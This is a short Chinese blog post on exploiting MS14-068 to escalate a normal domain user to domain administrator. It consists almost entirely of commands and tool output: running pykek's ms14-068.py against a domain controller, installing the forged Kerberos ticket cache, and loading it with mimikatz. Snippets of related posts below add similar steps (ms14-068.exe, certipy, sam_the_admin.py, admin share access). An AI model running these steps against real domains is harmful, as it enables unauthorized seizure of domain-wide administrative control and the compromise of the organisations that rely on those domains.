ms14-068漏洞获取域控管理员密码

最新推荐文章于 2024-06-21 13:49:16 发布
最新推荐文章于 2024-06-21 13:49:16 发布
阅读量369 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34268610/article/details/85183463
版权

工具下载地址:https://github.com/bidord/pykek/ 

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0
On Windows
python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`


weixin_34268610
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kerberos-MS14-068(kerberos域用户提权)
Ms08067安全实验室
11-20 237
点击星标,即时接收最新推文微软官方在2014年11月18日发布了一个紧急补丁,Windows全版本服务器系统受到影响,包括Windows Server 2003,Windows Server 2008,Windows Server 2008 R2,Windows Server 2012和Windows Server 2012 R2,修复了Microsoft Windows Kerberos KDC...
(转)MS14-068域内提权漏洞总结
weixin_30849591的博客
05-07 927
0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票。银票是一张tgs,也就是一张服务票据。服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器。所以ms14-068的来源和银票是息息相关的。 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许...
第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞
最新发布
weixin_71529930的博客
06-21 765
certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca abc-DC1-CA -template User -debug。python3 sam_the_admin.py 域名/'域控主机账号:密码' -dc-ip 域控ip -shell。ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址。只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞。查看ip已经变成了域控机的ip。
域内提权之MS14-068
good good study
03-17 4703
目标:普通域成员——>域管理员 漏洞利用前提 域控没有打MS14-068的补丁(KB3011780) 拿下一台加入域的计算机 有这台域内计算机的域用户密码和Sid 漏洞复现 环境: win2012(192.168.10.2) 域控,开启了防火墙 win7(192.168.10.5),域成员 1. win7获取域账户的密码及sid值 win7机器上查看域管理员,可发现,并没有自己 这里使用mimikatz去抓取域用户的明文密码 mimikatz.exe "privilege:....
MS14-068AD域提权神器
05-24
本地WINDOWS: 1.python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.local user-a-1@dom-a.loc位域用户 S-1-5-21-557603841-771695929-1514560438-1103 为账号SID dc-a-2003.dom-a.local域这机全名 可以通过:1)wmic useraccount where name=”USERNAME” get sid 2)whoami /all 本机可以直接查出自己的SID; 用法国神器破解,需要时最新版本的才支持, 2.mimikatz.exe log "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit TGT_user-a-1@dom-a.loc.ccache指的是第一步所生成的ccache文件。 3. kerberos::ptc TGT_secpulse@secpulse.local.ccache 4.查看: klist net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败 dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
MS14_068利用
weixin_45682070的博客
05-25 487
假设已经获得TargetShell,并且在域环境中并未打ms14_068的相关补丁 接下来我们进行利用 通过上篇文章的信息搜集(https://blog.csdn.net/weixin_45682070/article/details/106337762) 首先GitHub上下载ms14_068的利用脚本pykek python ms14-068.py -u whale@DC.com -s S-1-5-21-2867916317-3317112163-957300651-1113 -d 192.168.17
ms14-068.exe域内神器
11-25
【描述】中的"域内神器"暗示了这个工具对于管理员来说,可能是处理或防范MS14-068漏洞的重要工具,尤其是在企业网络环境中,域控制器的安全性至关重要。它可能帮助检测系统是否受到此漏洞的影响,或者提供一种方法来...
pykek-ms14-068.zip
01-06
标签“pykek-ms14-068.z”进一步强化了这个主题,暗示了内容与pykek工具和MS14-068漏洞有关。然而,标签中的".z"可能是一个错误,因为通常的文件扩展名是".zip",这可能是压缩文件的一部分。 在压缩包内的文件...
ms14-068利用工具包.zip
07-01
【标题】"ms14-068利用工具包.zip" 涉及的主要知识点是针对微软在2014年发布的安全公告MS14-068漏洞利用工具。这个工具包包含了两个可执行文件(MS14-068.exe)以及一个名为“minikataz”的64位程序,这可能是一个...
window2008R2 X64 .NET Framework 3.5.1 Padding Oracle MS10-070漏洞
06-07
用于修复 window2008R2 X64 .NET Framework 3.5.1 ASP.NET Padding Oracle 漏洞(MS10-070)
Get-MS14-068:快速简单的Powershell脚本来扫描事件日志,以了解MS14-068开发的可能指标
05-16
【描述】中提到的“快速简单”意味着这个脚本旨在提供一种高效的方法,帮助管理员迅速检查其网络环境,识别任何可能受到MS14-068影响的系统。通过分析事件日志,脚本可以捕获那些可能表明攻击者利用此漏洞的迹象,如...
MS14-068域渗透
bailandawang123的博客
03-10 460
ms14068主要是通过伪造域管的tgt,将普通用户提升为域管用户,从而控制域控
MS14-068提权
weixin_30402343的博客
06-18 240
Ms14-068 • 库 • https://github.com/bidord/pykek • ms14-068.py -u user@lab.com -s userSID -d dc.lab.com • 拷贝 TGT_user1@lab.com.ccache 到windows系统 • 本地管理员登陆 • mimikatz...
ADCS-CVE-2022-26923域内提权漏洞-域控
问题很多的小明
07-10 391
本文复现了ADCS域内漏洞CVE-2022-26923
[提权]域内提权神器 MS14-068 完整EXP
weixin_30359021的博客
04-12 622
可以让任何域内用户提升为域管理员 c:\python27\python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.localmimikatz.exe "kerberos::ptc TGT_k8test3@...
MS14-068 (CVE-2014-6324)域用户提权漏洞
做自己喜欢的事,并将其发挥到极致!
03-15 7390
文章目录声明一、漏洞简介二、漏洞原理三、实验环境四、漏洞利用利用思路前提条件方法一方法二方法三方法四五、参考文章 声明 本篇文章仅用于技术研究,切勿用于非法用途,仅供参考! 一、漏洞简介 远程权限提升漏洞存在于 Microsoft Windows 的 Kerberos KDC 实现中。存在该漏洞的情况为无法正确验证签名,这可能造成 Kerberos 服务票证的某些方面被人伪造。简单来说就是一个域内的普通账户可以利用此漏洞进行权限提升,升级为域管理员权限。 二、漏洞原理 Kerberos认证原理:http
【权限提升】WIN系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE漏洞
今天是几号的博客
03-06 709
CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,影响Windows Server 2008R2至Windows Server 2019的多个版本系统,只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.#WIN-域控提权-CVE-2022-26923。Kali添加访问域内信息 /etc/hosts。1、需要域用户账号密码。2、域内存在证书服务器。1、一个域内普通账号。
MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid
永不垂头的博客
08-29 434
MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid 文章目录MS14-068漏洞提权学习(实战)&& 域控服务器搭建 && 远程权限提升 && 查看域控中的sid前言一、MS14-068漏洞提权学习二、MS14-068漏洞提权实战三、域控服务器搭建四、远程权限提升五、查看域控中的sid六、我的公众号 前言 一、MS14-068漏洞提权学习 安装dcpro
MS14-068提权和impacket工具包提权
Unknowncheats的博客
02-07 271
ms14-068提权工具利用a)拿下边界机win7,并已经有win7上任意一个账号的密码-u 用户名@域-p 用户密码-s 用户sid-d 域控ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com生成一个ccache后缀票据导入票据导入之前,清空票据缓存kerberos::purge kerberos::ptc 票据使...
ms14-068漏洞实验
06-01
ms14-068 漏洞实验是一个模拟漏洞攻击的实验,旨在帮助安全研究人员、渗透测试人员和网络管理员更好地了解和防范该漏洞。该漏洞最初被发现于2014年,影响到了微软的 Windows 域控制器。攻击者可以利用该漏洞来提升其...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值